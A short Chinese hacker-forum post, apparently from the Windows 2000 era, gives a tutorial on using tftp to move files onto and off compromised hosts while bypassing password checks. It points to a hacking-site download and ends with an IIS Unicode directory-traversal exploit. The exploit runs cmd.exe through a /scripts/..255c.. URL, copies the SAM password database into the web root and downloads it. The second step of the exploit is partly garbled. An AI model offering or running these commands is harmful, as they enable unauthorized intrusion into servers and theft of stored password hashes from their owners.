tftp，一个功能强大的ftp代替软件，它强大的ftp功能可以绕过主机的用户名和口令验证，绕过
IPC$通道，直接COPY我们需要的文件，使用极其方便，我就在使用中的一些心得，写一点下来，
送给大家！

一、上传：
格式：tftp -i 现在你的IP get 源文件 盘符：\\路径\\目标文件名
二、下载：
格式：tftp -i 对方的IP put 盘符：\路径\源文件名

用法和注意点：
1、tftp必须在本机上先运行起来，充当虚拟服务器的角色。
2、tftp在运行中不得断开连接。
3、要上传的文件必须和tftp在一个目录中。
4、文件的默认下载位置就是tftp目录。
5、tftp在上传的格式中，目标地址要用双\\格开。
6、可以在任何对方的命令行使用tftp，如：跟在对方IP后的浏览器地址栏里（详细说明请参考U
漏洞的贴子）、SQLEXEC的command输入行等等位置。
7、tftp默认属性是上传和下载的时候采用覆盖不提示的方式。
8、tftp上传的文件可能会加上只读属性，请上传完全毕后检阅！

祝使用成功！

======================================================

忘了说一声了，不好意思了，阿Q说的那个是Win2000自己带的tftp，功能和ftp差不多，不信你在
命令行中ftp connect到一台主机，再在运行窗口中敲上tftp看看，呵呵……怎么少了一个窗
口？

本文指的软件全名是tftp32，下载地址为：
http://www.cnhack.org/hackusa/tftp.zip

=======================================================

今天送佛送上西天了！浏览器里直接下载sam._

1、http://IP/scripts/..255c../winnt/system32/cmd.exe?/c＋set
找到下面这一项（我这里举例）：PATH_TRANSLATED=d:\Inetpub\wwwroot

2、
http://IP/scripts....._+d:\I
netpub\wwwroot

3、http://IP/sam._
完毕，这就是直接下载！很方便吧？

注意：上面很多朋友可能都有个笔误，命令中要下载的文件名是sam._，而不是sam，大家请留意
了！